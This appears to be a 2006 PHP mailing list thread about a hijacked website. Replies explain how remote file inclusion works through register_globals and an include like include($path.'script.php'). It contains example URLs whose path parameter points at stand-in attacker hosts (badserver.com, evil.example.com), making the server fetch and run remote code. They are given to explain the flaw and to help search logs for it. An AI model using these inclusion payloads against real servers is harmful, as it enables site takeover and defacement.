rory.. thanks.. i had meant to say assuming globals is off... -----Original Message----- From: Rory Browne [mailto:rory.browne@xxxxxxxxx] Sent: Monday, November 13, 2006 10:12 AM To: PHP Subject: Fwd: Highjack? ---------- Forwarded message ---------- From: Rory Browne <rory.browne@xxxxxxxxx> Date: Nov 13, 2006 7:12 PM Subject: Re: Highjack? To: bedouglas@xxxxxxxxxxxxx On 11/13/06, bruce <bedouglas@xxxxxxxxxxxxx> wrote: > > eric... > > you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how > is > this simple piece of code exploitable. assuming $path is not something > that > comes via the url vars (GET/POST/REQUEST) If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript .txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php it shouldn't be able to be touched > by external/client processes... similarly, the 'foo' would be static, and > couldn't be munged... > > thoughts/explanations... > > thanks > > > > -----Original Message----- > From: Eric Butera [mailto:digital.tarsier@xxxxxxxxx] > Sent: Monday, November 13, 2006 9:39 AM > To: tedd > Cc: PHP General List > Subject: Re: Highjack? > > > On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote: > > Hi gang: > > > > While this is not an obvious php question, it does deal with security > > which is a concern. > > > > Just this morning had a couple of my sites "highjacked". What I found > > was someone had replaced my root level index.php with their own > > index.php. You can see the result at: > > > > http://xn--u2g.com/index1.php > > > > It was not a terrible loss nor inconvenience, but I wonder how they > > did it. Any ideas how this was done and suggestions as to how to > > prevent this from happening again? > > > > Thanks, > > > > tedd > > > > -- > > ------- > > http://sperling.com http://ancientstones.com http://earthstones.com > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > Tedd, > > I've seen this happen before when someone was able to do a remote code > execution exploit on an old version of a very popular open source > shopping cart project. I'd say the first thing would be to try and > find any include/require statements that are exploitable. In the case > I was dealing with, it was a problem with register_globals on and an > include that looked a bit like this include($path .'script.php');. > How embarrassing. > > If you have access to your server logs look for urls such as > http://example.com/exploited.php?action=http://evil.example.com/inject.txt > . > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
